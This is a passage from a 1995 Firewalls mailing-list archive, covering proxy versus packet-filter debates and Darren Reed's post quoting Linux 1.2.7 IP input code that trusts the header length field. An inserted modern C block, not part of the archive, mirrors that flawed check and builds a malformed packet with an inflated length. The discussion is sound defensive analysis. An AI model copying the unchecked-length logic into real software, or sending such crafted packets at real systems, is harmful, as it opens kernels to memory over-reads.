  ftp://ftp.bsdi.com/contrib/networking/security/ipfirewall_v2.0a.shar.gz

TIS fwtk: A good choice, though not suitable for our application.

ip_gw: Some screend lookalike. No information provided about this software.

ALF: A commercial package that can convert a BSDI box into a full-fledged screening router/packet filter. Contact information follows:
  Ari Shamash
  SOS corporation                voice 1-800-SOS-UNIX or 1-212-686-5700
  461 5th Avenue, 16th floor     fax: 1-212-686-5703
  New York, NY 10017             email: ari@soscorp.com

ip_fil: A loadable kernel module that implements packet filtering with NetBSD. It's reported to work like a charm. This package is available at:
  ftp://coombs.anu.edu.au:/pub/net/kernel/ip_fil2.5.2.tar.gz

Many thanks to:
  Scott Barman
  mht@shore.net (Mark Teicher)
  Danny Boulet
  David Maynard
  "Jim.Shaw"
  "Daniel O'Callaghan"
  ari@soscorp.com (Ari Shamash)
  Darren Reed
  Bob Beck

__________________________________________________________
| Luis E. Mu~oz R.          | PGP2.1 Key available via     |
| Internet: lem@usb.ve      | `finger lem@jihad.usb.ve'    |
| NIC: LEM (lat), LM39      |                              |
| uucp: sun!emsca!usb!lem   |==============================|
| Phone/Fax: 582-9431402    | These opinions are mine alone|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From firewalls-owner Tue May 2 18:45:25 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA00636 for firewalls-outgoing; Tue, 2 May 1995 18:15:24 -0700
Received: from noc1.mid.net (noc1.mid.net [198.247.250.15]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id SAA00629 for ; Tue, 2 May 1995 18:15:18 -0700
Received: from jayhawk.mid.net (jayhawk.mid.net [198.247.250.21]) by noc1.mid.net (8.6.10/8.6.9) with ESMTP id UAA19152; Tue, 2 May 1995 20:15:35 -0500
Received: (from alan@localhost) by jayhawk.mid.net (8.6.10/8.6.9) id UAA09936; Tue, 2 May 1995 20:15:51 -0500
From: Alan Hannan
Message-Id: <199505030115.UAA09936@jayhawk.mid.net>
Subject: Re: Help with begining options?
To: bwern@jax.jaxnet.com (Ben Wern)
Date: Tue, 2 May 1995 20:15:51 -0500 (CDT)
Cc: Firewalls@GreatCircle.COM
In-Reply-To: <199505020700.DAA27248@jax.jaxnet.com> from "Ben Wern" at May 2, 95 03:00:55 am
X-Mailer: ELM [version 2.4 PL23]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 1851
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> This may not specifically be in the charter, but I'm asking anyways. I'm

This wouldn't be the first time... ;)

> The firewall should allow any outgoing traffic, but restrict incoming
> traffic to ONLY SMTP to one machine inside the net. All other servers
> (FTP, WWW, Etc. are in the unprotected network.)

Of course you realize that by this method you make your entire internal subnet only as strong as that SMTP server. Just an observation.

> Anyone care to offer thoughts, etc. for a new firewalls person?
If both you and your company trust someone internal to implement this firewall, then TIS's Firewall Tool Kit (FWTK) is a good alternative. These quality tools can be used to create an effective firewall.

Another option is to outsource the talent to build the firewall. While I cannot endorse this unilaterally, often this is an acceptable solution to a company limited by money.

If you are looking to provide your company with a link that only allows incoming mail, then you have cut off all returning traffic except that. By your definition (which I think you misphrased) WWW, news, ftp would also be limited.

If you develop a firewalling system that allows returning packets simply on the basis of the "ack" bit, then you are risking significant exposure. A proxy firewall is the best solution to this, which is why I'm a big fan of TIS and their product, which we resell. However, if you only want the 80 percent security, then plop the money down to one of the packet filtering vendors.

Good luck.

--
alan@mid.net, (402) 472-0241 (voice)
Networked Systems Administrator (402) 472-0240 (fax)
MIDnet, the United States Oldest Regional Internet Service Provider
" They that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety. " - Benjamin Franklin

From firewalls-owner Tue May 2 19:09:03 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA01716 for firewalls-outgoing; Tue, 2 May 1995 18:50:20 -0700
Received: from explorer (explorer.ho.BoM.GOV.AU [134.178.8.120]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id SAA01690 for ; Tue, 2 May 1995 18:49:59 -0700
Message-Id: <199505030149.SAA01690@miles.greatcircle.com>
Received: from BoM.GOV.AU (localhost) by explorer with ESMTP (1.37.109.15/16.2) id AA183015811; Wed, 3 May 1995 01:50:12 GMT
X-Mailer: exmh version 1.6 4/21/95
To: firewalls@greatcircle.com
From: richard.jones@BoM.GOV.AU (Richard Jones)
Reply-To: richard.jones@BoM.GOV.AU
Subject: Some f/w capability questions.
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Wed, 03 May 1995 01:50:10 GMT
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

We're looking to buy a f/w system that will be fault-tolerant and provide several services, some of which are required to be high speed and low-latency. We cannot afford to place any service machines in the DMZ, due to the inherent risks of being unprotected, management issues and cost of new machines.

I would appreciate if anyone (vendors or even installed system administrators) can inform me of the following for Gauntlet, BorderWare, Brimstone, Eagle, Firewall-1 and Interlock:

1. Redundancy / Fault tolerance. I need the services to stay available if something unforeseen happens, like a bug in the software or a fault in the hardware. This is a Most Important Feature. Something like HP's Switchover system would be good.

2. Speed / Performance. I have seen claims on this list that Pentium firewalls run at T1 speeds (they're "fast enough" -- but fast enough for WHAT?). We have an E1 (2Mbit) link to the Internet, plus other services that bring the total up to about 3Mbits.
I need to know if these firewalls can proxy/serve (not just run filtering) many (20+) telnet/rlogin sessions, some (10+) FTP sessions, many (several 1000+) WWW connections per day, NNTP, SMTP, X11, etc. and keep a high-speed, low latency operationally critical service running as well. How do the highly-transparent services suffer when the firewall is heavily loaded by proxying or serving?

3. How many of these firewalls provide # of session rules for connections? I have only seen one firewall's (BorderWare) documentation that mentions it...

4. To keep the masses happy, we may need to provide some RPC support. Firewall-1 claims to keep state info - is this overrated, and should I just say no to these people?

5. Exactly what benefits does one achieve from running a proxy HTTP? NNTP? Gopher?

Please reply to me, and I'll summarise. If anyone has any specific queries about our site's requirements for a firewall, please contact me. I figured this email was getting too long :)

Richard.

Richard Jones, Supercomputing Section at the Bureau of Meteorology, Australia.
richard.jones@BoM.GOV.AU, MIME accepted. Work phone: +61-3-669-4539

From firewalls-owner Tue May 2 19:39:03 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA02562 for firewalls-outgoing; Tue, 2 May 1995 19:10:55 -0700
Received: from all.net (all.net [204.7.229.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id TAA02557 for ; Tue, 2 May 1995 19:10:46 -0700
From: fc@all.net (Dr. Frederick B. Cohen)
Received: by all.net (4.1/3.2.012693-Management Analytics); id AA03528 for firewalls@greatcircle.com; Tue, 2 May 95 22:06:46 EDT
Message-Id: <9505030206.AA03528@all.net>
Subject: Firewalls with distributed GUI management interfaces
To: firewalls@greatcircle.com
Date: Tue, 2 May 1995 22:06:45 -0400 (EDT)
X-Mailer: ELM [version 2.4 PL22]
Content-Type: text
Content-Length: 891
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

The (now) 3 products:

- Brimstone from SOS
- Firewall-1
- A soon-to-be-released product from Cohesive

All claim to have GUIs that allow remote management of multiple firewalls and automated setting of most common options (what to pass from and to where, what to detect, how to respond, etc.). From my limited conversations with them, none are perfect, but at least two are fairly well thought out. No verification done by experiment.

--
-----------------
\Management /\/| 216-686-0090 - PO Box 1480, Hudson, OH 44236
 \ /\/         | Check out info-security heaven and test your system
  \/\ /\/      | for known vulnerabilities (1st time for free) at URL:
   \/Analytics | (scans deeper than SATAN or ISS) http://all.net:8080
-----------------
Read "Protection and Security on the Information Superhighway"
John Wiley and Sons, 1995 ISBN 0-471-11389-1, 320 pp, $24.95

From firewalls-owner Tue May 2 20:03:23 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA03047 for firewalls-outgoing; Tue, 2 May 1995 19:29:02 -0700
Received: from gk_west.usps.gov (gk-west.usps.gov [198.120.14.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id TAA03041 for ; Tue, 2 May 1995 19:29:00 -0700
Received: by gk_west.usps.gov (5.65/fma-120691); id AA19839; Tue, 2 May 95 19:29:24 -0700
Received: by RALSSW01.USPS.GOV (Soft*Switch Central V4L380P5) id 902227210095122FRALSSW01; 02 May 1995 21:27:21 GMT
Message-Id:
Date: 02 May 1995 21:27:21 GMT
From: "Postmaster"
Subject: DISTRIBUTION STATUS
To: Firewalls@GreatCircle.COM
Comment: MEMO 05.02.95 21.27
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

SMTP.FIREWAL1 DISTRIBUTION STATUS INFORMATION 05/02/95 21:27:0
=======================================================================
DISTRIBUTION ID: SMTP.FIREWAL1.8599
SUBJECT : Firewalls-Digest V4 #280
DATE SENT : 05/02/95   TIME SENT: 21:26:00
=======================================================================
YOUR MAIL WAS NOT DELIVERED FOR THE FOLLOWING REASON:
SNADS STATUS : 000F
EXPLANATION : SNADS SYSTEM ERROR
=======================================================================
RECIPIENT : RANC006L.DDAY
LAST NAME : DAY
FIRST NAME : DONALD
MIDDLE INITIAL : M
NATIVE NAME : DONALD M DAY at RANC003L
COUNTRY :
ADMD :
PRMD :
ORGANIZATION :
ORG UNIT 1 :
ORG UNIT 2 : CCMAIL/RANC003L
ORG UNIT 3 : CCMAIL ADDRESS
ORG UNIT 4 :
DDA :

From firewalls-owner Tue May 2 21:19:03 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA04471 for firewalls-outgoing; Tue, 2 May 1995 20:52:30 -0700
Received: from ken.canbtimes.com.au (ken.canbtimes.com.au [203.5.63.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id UAA04460 for ; Tue, 2 May 1995 20:52:13 -0700
Message-Id: <199505030352.UAA04460@miles.greatcircle.com>
Received: by ken.canbtimes.com.au (1.37.109.11/16.2) id AA003183208; Wed, 3 May 1995 13:53:28 +1000
From: John Cougar
Subject: Re: TRUST US and other hooui
To: DanaNowell@corsof.com (Dana Nowell) (Dana Nowell)
Date: Wed, 3 May 95 13:53:28 EST
Cc: firewalls@GreatCircle.com
In-Reply-To: <199505022144.OAA21577@miles.greatcircle.com>; from "Dana Nowell" at May 02, 95 5:42 pm
Mailer: Elm [revision: 70.85.2.1]
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Ha! Now for MY two cents worth (is there such a denomination anymore?)

> >
> >The point is that it's much easier to evaluate the correctness of a
> >stereo installation in a car than it is to evaluate whether a patch is
> >"properly installed" and "compatible."
> >I don't have any figures on the
> >failure rate for stereo installations, but they can't possibly be as
> >risky as software patching.

I'd like to see the axiomatic algebra for proving the correctness of _any_ physical system ... Anyone?

> >
> >> > Also, the
> >> > most likely failure modes decrease your enjoyment of your car but are
> >> > unlikely to risk your life and safety.
> >>
> >> You mean like non-working turn signals?
> >
> >In a car, the problem was limited to the electrical system handling
> >low wattage devices. It didn't affect the ignition and thus affect the
> >car's mission critical behavior. Changes to security software are
> ... cut ...

Yeh. Right. So we don't have algorithms in cars, huh? What about EMS's and AntiLock Brake systems ... ETC.? What do you guys DRIVE? You know, some brainiac over at Toy-Motor (read Toyota) (or was it Nis-san - read Dat-sun - ?) recently released a car with fibre routed comms. doing _all_ essential management. Now I ask you ... where is the redundancy now?

> >
>
> I suppose when the auto dealer swaps out the computer controller that
> controls the throttle, timing, etc. via software in the latest and greatest
> revision PROM I'm also at low risk :-). In today's environment just about
> ... cut ...
> someone has used their toolkit to build a 911 emergency response system.
> Face it software is everywhere, if you want to worry about it or be scared
> its usually the best you can do in the practical world.
> ... cut ...

Hear, hear. Good (w)Rap, Dana!
--
----------------------------------------------------------------------
John Cougar                     | email: johnc@canbtimes.com.au
Systems Consultant              | voice: ++ 61 6 280 2128
Australian Technology Resources | mobile: ++ 61 018 488867
                                | fax: ++ 61 6 280 5420
----------------------------------------------------------------------

From firewalls-owner Tue May 2 21:46:54 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA05401 for firewalls-outgoing; Tue, 2 May 1995 21:35:29 -0700
Received: from wicked.neato.org (wicked.neato.org [198.70.96.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id VAA05396 for ; Tue, 2 May 1995 21:35:26 -0700
Received: (from george@localhost) by wicked.neato.org (8.6.12/8.6.12) id VAA17836; Tue, 2 May 1995 21:36:10 -0700
Date: Tue, 2 May 1995 21:36:10 -0700
From: George Mullins
Message-Id: <199505030436.VAA17836@wicked.neato.org>
To: Alan Hannan
Cc: bwern@jax.jaxnet.com (Ben Wern), Firewalls@GreatCircle.COM
Subject: Re: Help with begining options?
In-Reply-To: <199505030115.UAA09936@jayhawk.mid.net>
References: <199505020700.DAA27248@jax.jaxnet.com> <199505030115.UAA09936@jayhawk.mid.net>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Alan Hannan writes:
> > The firewall should allow any outgoing traffic, but restrict incoming
> > traffic to ONLY SMTP to one machine inside the net. All other servers
> > (FTP, WWW, Etc. are in the unprotected network.)
>
> Of course you realize that by this method you make your entire internal
> subnet only as strong as that SMTP server. Just an observation.

And a wrong observation. While I would suggest using smap or sendmail on a machine on a DMZ network, if the only incoming traffic is restricted to SMTP, what is the attacker going to do that they couldn't do with any other type of firewall setup. Mail will be passed in any design.
> If you are looking to provide your company with a link that only
> allows incoming mail, then you have cut off all returning traffic
> except that. By your definition (which I think you misphrased)
> WWW, news, ftp would also be limited.

This is simply not the case. You can allow only incoming smtp traffic while allowing full access out - WWW, news, telnet and ftp would NOT be limited.

> If you develop a firewalling system that allows returning packets
> simply on the basis of the "ack" bit, then you are risking
> significant exposure.

I agree, sort of. I don't think that there is "significant" exposure, but trusting the ack bit is by no means fool-proof. I believe that there could be ways to gain access using this.

> A proxy firewall is the best solution to this, which is why I'm a
> big fan of TIS and their product, which we resell. However, if you
> only want the 80 percent security, then plop the money down to one
> of the packet filtering vendors.

It isn't the BEST solution. There is no BEST solution. Proxy servers fit well into some environments, packet filters into others and "smart" packet filters into others. I could answer your statement as "if you only want 80 percent of the performance with no more security plop your money down with someone willing to install a proxy server firewall."
George

From firewalls-owner Tue May 2 22:39:04 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA06426 for firewalls-outgoing; Tue, 2 May 1995 22:18:27 -0700
Received: from jax.jaxnet.com (jax.jaxnet.com [204.183.221.4]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id WAA06421 for ; Tue, 2 May 1995 22:18:23 -0700
Received: from slip13.unf.edu (jax.jaxnet.com [204.183.221.4]) by jax.jaxnet.com (8.6.9/8.6.9) with SMTP id BAA09422; Wed, 3 May 1995 01:23:13 -0400
Date: Wed, 3 May 1995 01:23:13 -0400
Message-Id: <199505030523.BAA09422@jax.jaxnet.com>
X-Sender: bwern@jax.jaxnet.com
X-Mailer: Windows Eudora Version 1.4.4
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: George Mullins
From: bwern@jax.jaxnet.com (Ben Wern)
Subject: Re: Help with begining options?
Cc: firewalls@greatcircle.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> > Of course you realize that by this method you make your entire internal
> > subnet only as strong as that SMTP server. Just an observation.
>And a wrong observation. While I would suggest using smap or sendmail
>on a machine on a DMZ network, if the only incoming traffic is
>restricted to SMTP, what is the attacker going to do that they
>couldn't do with any other type of firewall setup. Mail will be
>passed in any design.

That was my thinking as well.

> > If you develop a firewalling system that allows returning packets
> > simply on the basis of the "ack" bit, then you are risking
> > significant exposure.
>I agree, sort of. I don't think that there is "significant" exposure,
>but trusting the ack bit is by no means fool-proof. I believe that
>there could be ways to gain access using this.

True enough. The idea in my head whilst developing this was to do the most with the least amount of money (since that's what they're going to give me), and then try like heck to get the funds to upgrade the firewall to a fuller solution later.
> > A proxy firewall is the best solution to this, which is why I'm a

My understanding is that using a filter on the ip layer (like FWTK would provide), relied on ack packets, which could be forged. A proxy takes care of that problem, and would allow me to allow those services to only be originated from within the internal network, correct?

Sorry for the no doubt easy questions, but I'm struggling to learn this quickly. :)

Thanks for the help all!

Ben Wern
bwern@jaxnet.com  | PGP Key available by Finger!
bwern@pathtech.com| PGP Mail gets priority!
bwern@unf6.edu    | Ask for it by name!
"I used to get disgusted, but now I just get amused"

From firewalls-owner Tue May 2 23:05:02 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA06419 for firewalls-outgoing; Tue, 2 May 1995 22:18:21 -0700
Received: from jax.jaxnet.com (jax.jaxnet.com [204.183.221.4]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id WAA06414 for ; Tue, 2 May 1995 22:18:18 -0700
Received: from slip13.unf.edu (jax.jaxnet.com [204.183.221.4]) by jax.jaxnet.com (8.6.9/8.6.9) with SMTP id BAA09416; Wed, 3 May 1995 01:23:07 -0400
Date: Wed, 3 May 1995 01:23:07 -0400
Message-Id: <199505030523.BAA09416@jax.jaxnet.com>
X-Sender: bwern@jax.jaxnet.com
X-Mailer: Windows Eudora Version 1.4.4
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: Alan Hannan
From: bwern@jax.jaxnet.com (Ben Wern)
Subject: Re: Help with begining options?
Cc: firewalls@greatcircle.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> This wouldn't be the first time... ;)

Same as it ever was.. :)

>> The firewall should allow any outgoing traffic, but restrict incoming
>> traffic to ONLY SMTP to one machine inside the net.
> Of course you realize that by this method you make your entire internal
>subnet only as strong as that SMTP server. Just an observation.

How so?
The proxy server should be limiting traffic that is coming into the internal subnet to a) one machine and b) only SMTP packets. At that point, I would think that it would only be open to SMTP based attacks. Yes/No? > If both you and your company trust someone internal to implement this >firewall, then TIS's Firewall Tool Kit (FWTK) is a good alternative. Unfortunatly, I'm our company's only in-house person with administration experience on a UNIX box (yes, sad but true.) Which means that I'm also the only person available to set this up, and while I've got some unix behind me, I've never set up a firewall before, and wouldn't trust my own setup further than I could see it. As far as TIS goes, I'm more than willing to give it a try. Am I correct in thinking that the kit provides for both IP level blocking and proxy server stuff? (re: I could lock off access as I described previously.. ) >If you develop a firewalling system that allows returning packets simply on the >basis of the "ack" bit, then you are risking significant exposure. A proxy >firewall is the best solution to this, That's very true. Unfortunatly, with no budget (well... close to no budget) for an entire internet installation, I don't know if I can finagle another 10k for the full product. My hope is to get a reasonable amount of security, and then try to demonstrate the need for more (once we have the network connection up and running.) At that point, it would just require switching the software, which would be simple enough. (well, compared to the whole install that is. :) ) Nice quote, BTW. :) Ben Wern bwern@jaxnet.com | PGP Key available by Finger! bwern@pathtech.com| PGP Mail gets priority! bwern@unf6.edu | Ask for it by name! 
"I used to get disgusted, but now I just get amused"

From firewalls-owner Wed May 3 02:11:00 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA18632 for firewalls-outgoing; Wed, 3 May 1995 01:54:42 -0700
Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id BAA18625 for ; Wed, 3 May 1995 01:54:34 -0700
Message-Id: <199505030854.BAA18625@miles.greatcircle.com>
Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA183941388; Wed, 3 May 1995 18:56:28 +1000
From: Darren Reed
Subject: Re: Linux as multi-homed firewall... (fwd)
To: firewalls@greatcircle.com
Date: Wed, 3 May 1995 18:56:28 +1000 (EST)
X-Mailer: ELM [version 2.4 PL23]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 5015
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I posted this mail elsewhere, and I'm doing it again here for user education. Sorry to those who see it twice. Maybe I should/could post it to bugtraq (even instead of), but the point I'm trying to make isn't one centred on bugs, but on choice of software for firewalls and the quality thereof. Someone who uses linux might want to file a bug report if they think it's serious enough.

Oh, btw, if you're using Linux because of the IPFIREWALL stuff it has built in, think again. It is *NOT* being done correctly here. Maybe someone should sit down and take a good close look at Linux for us...

Cheers,
Darren

In some mail from Darren Reed, they said:
>From darrenr@vitruvius.arbld.unimelb.edu.au Wed May 3 12:56:11 EST 1995
From: Darren Reed
Message-Id: <199505030252.MAA01552@vitruvius.arbld.unimelb.EDU.AU>
Subject: Re: Linux as multi-homed firewall...
Date: Wed, 3 May 1995 12:52:25 +1000 (EST)

In some email I received from Marco Pauck, they wrote:
>
> [Sorry if this is redundant but I think that my first message didn't make it.]
> > > CAUTION: The last time I looked (1.1.99 I think) at the Linux kernel, there
> > were still bugs which could be fatal in the IP code. If you
> > can, change to using either NetBSD or FreeBSD (in that order).
> > Linux is _not_ a mature operating system and I consider it
> > unsuitable for serious firewall use.
>
> Could you please give some more information about what you consider
> 'fatal bugs'?

You're familiar with the problems of not doing bounds checking with arrays and things of static size in nature like IP packets, right ? Imagine if your kernel thought it had a 1024 byte packet when it had only received 20 bytes. What do _you_ think would happen, hmm ?

Now, since people (who typically run Linux) have been so stubborn about there not being a bug, I'll cut and paste the segment so you can see for yourselves. The bug is, as far as I'm concerned, plain to see. Maybe Linux does something that I'm missing...but I doubt it.

NOTE: *I* DON'T USE LINUX and I don't care a single bit for it. If bugs this major can survive for so long and nobody else has bothered to read the code and compare it with what else exists, then, in my opinion, that doesn't speak too highly for it being used in environments such as firewalls. But that's just IMO, of course. Maybe Linux should get a clue and just import as much as they can of the TCP/IP code from 4.4-Lite.

Darren

p.s. Since linux users are being just as stubborn in other mailing lists, I'll probably repost this there too for their enlightenment.

p.p.s Sorry toolkit users for this interruption, but this has gone on long enough.

Linux 1.2.7 linux/net/inet/ip.c:

[...]
ip_rcv(...)
[...]
	/* Header sanity checks: buffer holds a header, ihl >= 5, version 4, checksum ok */
	if (skb->len<sizeof(struct iphdr) || iph->ihl<5 || iph->version != 4 || ip_fast_csum((unsigned char *)iph, iph->ihl) !=0)
	{
		ip_statistics.IpInHdrErrors++;
		kfree_skb(skb, FREE_WRITE);
		return(0);
	}

	/*
	 *	See if the firewall wants to dispose of the packet.
	 */

#ifdef CONFIG_IP_FIREWALL
	if ((err=ip_fw_chk(iph,dev,ip_fw_blk_chain,ip_fw_blk_policy, 0))!=1)
	{
		if(err==-1)
			icmp_send(skb, ICMP_DEST_UNREACH, ICMP_PORT_UNREACH, 0, dev);
		kfree_skb(skb, FREE_WRITE);
		return 0;
	}
#endif

	/*
	 *	Our transport medium may have padded the buffer out. Now we know it
	 *	is IP we can trim to the true length of the frame.
	 */

	/* NB: no check that skb->len is at least tot_len before it is overwritten */
	skb->len=ntohs(iph->tot_len);
[...]

NetBSD-current (OR any other 4.4-Lite based system) : /sys/netinet/ip_input.c:

[...]
ipintr()
[...]
	/*
	 * If no IP addresses have been set yet but the interfaces
	 * are receiving, can't do anything with incoming packets yet.
	 */
	if (in_ifaddr == NULL)
		goto bad;
	ipstat.ips_total++;
	if (m->m_len < sizeof (struct ip) &&
	    (m = m_pullup(m, sizeof (struct ip))) == 0) {
		ipstat.ips_toosmall++;
		goto next;
	}
	ip = mtod(m, struct ip *);
	if (ip->ip_v != IPVERSION) {
		ipstat.ips_badvers++;
		goto bad;
	}
	hlen = ip->ip_hl << 2;
	if (hlen < sizeof(struct ip)) {	/* minimum header length */
		ipstat.ips_badhlen++;
		goto bad;
	}
	if (hlen > m->m_len) {
		if ((m = m_pullup(m, hlen)) == 0) {
			ipstat.ips_badhlen++;
			goto next;
		}
		ip = mtod(m, struct ip *);
	}
	if (ip->ip_sum = in_cksum(m, hlen)) {	/* assignment intended: checksum of a valid header is 0 */
		ipstat.ips_badsum++;
		goto bad;
	}

	/*
	 * Convert fields to host representation.
	 */
	NTOHS(ip->ip_len);
	if (ip->ip_len < hlen) {
		ipstat.ips_badlen++;
		goto bad;
	}
	NTOHS(ip->ip_id);
	NTOHS(ip->ip_off);

	/*
	 * Check that the amount of data in the buffers
	 * is as at least much as the IP header would have us expect.
	 * Trim mbufs if longer than we expect.
	 * Drop packet if shorter than we expect.
	 */
	if (m->m_pkthdr.len < ip->ip_len) {
		ipstat.ips_tooshort++;
		goto bad;
	}
	if (m->m_pkthdr.len > ip->ip_len) {
		if (m->m_len == m->m_pkthdr.len) {
			m->m_len = ip->ip_len;
			m->m_pkthdr.len = ip->ip_len;
		} else
			m_adj(m, ip->ip_len - m->m_pkthdr.len);
	}
[...]
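To make the length check Darren is pointing at concrete, here is an added C example (not from his post, nor from either kernel): a user-space re-implementation of the 4.4BSD-Lite check order quoted above, a mirror of the quoted ip_rcv() length handling, and a constructed 20-byte header whose tot_len claims 1024 bytes. The function names (validate_ipv4, linux_1_2_7_skb_len, build_header) and the 192.0.2.x addresses are this example's own.

```c
/* Added example: validate an IPv4 header against the bytes actually received, in
 * the order 4.4BSD-Lite ipintr() does, beside a mirror of the quoted Linux 1.2.7
 * ip_rcv() logic that overwrites skb->len with ntohs(iph->tot_len). */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define IP_MIN_HDR 20u  /* sizeof(struct ip): header without options */

enum ip_verdict {
    IP_OK = 0,    IP_TOOSMALL, IP_BADVERS,  /* fewer than 20 bytes; ip_v != 4 */
    IP_BADHLEN,   IP_BADSUM,                /* ihl < 5 or hlen > received; checksum */
    IP_BADLEN,    IP_TOOSHORT               /* tot_len < hlen; tot_len > received */
};

/* RFC 791 one's-complement checksum over the header; a result of 0 means valid. */
static uint16_t ip_cksum(const uint8_t *hdr, size_t hlen)
{
    uint32_t sum = 0;
    for (size_t i = 0; i + 1 < hlen; i += 2)
        sum += ((uint32_t)hdr[i] << 8) | hdr[i + 1];
    if (hlen & 1)
        sum += (uint32_t)hdr[hlen - 1] << 8;
    while (sum >> 16)                              /* fold carries */
        sum = (sum & 0xffffu) + (sum >> 16);
    return (uint16_t)~sum;
}

/* The 4.4BSD-Lite sequence of checks.  On IP_OK, *frame_len is reduced to
 * tot_len so that link-layer padding is never treated as IP payload. */
enum ip_verdict validate_ipv4(const uint8_t *buf, size_t received, size_t *frame_len)
{
    if (received < IP_MIN_HDR)                     /* m_len < sizeof(struct ip) */
        return IP_TOOSMALL;
    if ((buf[0] >> 4) != 4)                        /* ip_v != IPVERSION */
        return IP_BADVERS;
    size_t hlen = (size_t)(buf[0] & 0x0f) << 2;    /* ip_hl << 2 */
    if (hlen < IP_MIN_HDR || hlen > received)      /* too short, or m_pullup() fails */
        return IP_BADHLEN;
    if (ip_cksum(buf, hlen) != 0)
        return IP_BADSUM;
    size_t tot_len = ((size_t)buf[2] << 8) | buf[3];   /* NTOHS(ip_len) */
    if (tot_len < hlen)
        return IP_BADLEN;
    if (received < tot_len)                        /* the check ip_rcv() does not make */
        return IP_TOOSHORT;
    *frame_len = tot_len;                          /* m_adj(): trim, never grow */
    return IP_OK;
}

/* Mirror of the quoted ip_rcv(): the same header sanity checks, then skb->len
 * becomes ntohs(tot_len) regardless of what arrived.  Returns 0 for a drop,
 * otherwise the length the kernel would now believe the buffer holds. */
size_t linux_1_2_7_skb_len(const uint8_t *buf, size_t received)
{
    if (received < IP_MIN_HDR || (buf[0] & 0x0f) < 5 || (buf[0] >> 4) != 4 ||
        ip_cksum(buf, (size_t)(buf[0] & 0x0f) << 2) != 0)
        return 0;
    return ((size_t)buf[2] << 8) | buf[3];
}

/* Constructed 20-byte header (no options) with the given tot_len and a valid
 * checksum; addresses are from the 192.0.2.0/24 documentation range. */
static void build_header(uint8_t hdr[IP_MIN_HDR], uint16_t tot_len)
{
    static const uint8_t addrs[8] = { 192, 0, 2, 1, 192, 0, 2, 2 };  /* src, dst */
    memset(hdr, 0, IP_MIN_HDR);
    hdr[0] = 0x45;                                 /* version 4, ihl 5 */
    hdr[2] = (uint8_t)(tot_len >> 8);
    hdr[3] = (uint8_t)tot_len;
    hdr[8] = 64;                                   /* TTL */
    hdr[9] = 17;                                   /* protocol: UDP */
    memcpy(hdr + 12, addrs, sizeof addrs);
    uint16_t c = ip_cksum(hdr, IP_MIN_HDR);
    hdr[10] = (uint8_t)(c >> 8);
    hdr[11] = (uint8_t)c;
}

/* The post's scenario: only 20 bytes arrive, but the header claims 1024. */
enum ip_verdict bsd_verdict_for_inflated_packet(void)
{
    uint8_t pkt[IP_MIN_HDR]; size_t n = 0;
    build_header(pkt, 1024);
    return validate_ipv4(pkt, sizeof pkt, &n);     /* IP_TOOSHORT: dropped */
}

size_t linux_len_for_inflated_packet(void)
{
    uint8_t pkt[IP_MIN_HDR];
    build_header(pkt, 1024);
    return linux_1_2_7_skb_len(pkt, sizeof pkt);   /* 1024, from a 20-byte buffer */
}

/* Legitimate case: a 28-byte datagram padded out to a 60-byte Ethernet frame. */
size_t trimmed_len_for_padded_frame(void)
{
    uint8_t frame[60] = { 0 }; size_t n = 0;
    build_header(frame, 28);
    return validate_ipv4(frame, sizeof frame, &n) == IP_OK ? n : 0;   /* 28 */
}
```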
From firewalls-owner Wed May 3 04:09:22 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA21665 for firewalls-outgoing; Wed, 3 May 1995 03:52:36 -0700
Received: from ashley.business.uwo.ca (ashley.business.uwo.ca [129.100.22.27]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id DAA21660 for ; Wed, 3 May 1995 03:52:32 -0700
Received: (from a5charti@localhost) by ashley.business.uwo.ca (8.6.8/8.6.6) id GAA17097; Wed, 3 May 1995 06:52:38 -0400
From: Alex Chartier
Message-Id: <199505031052.GAA17097@ashley.business.uwo.ca>
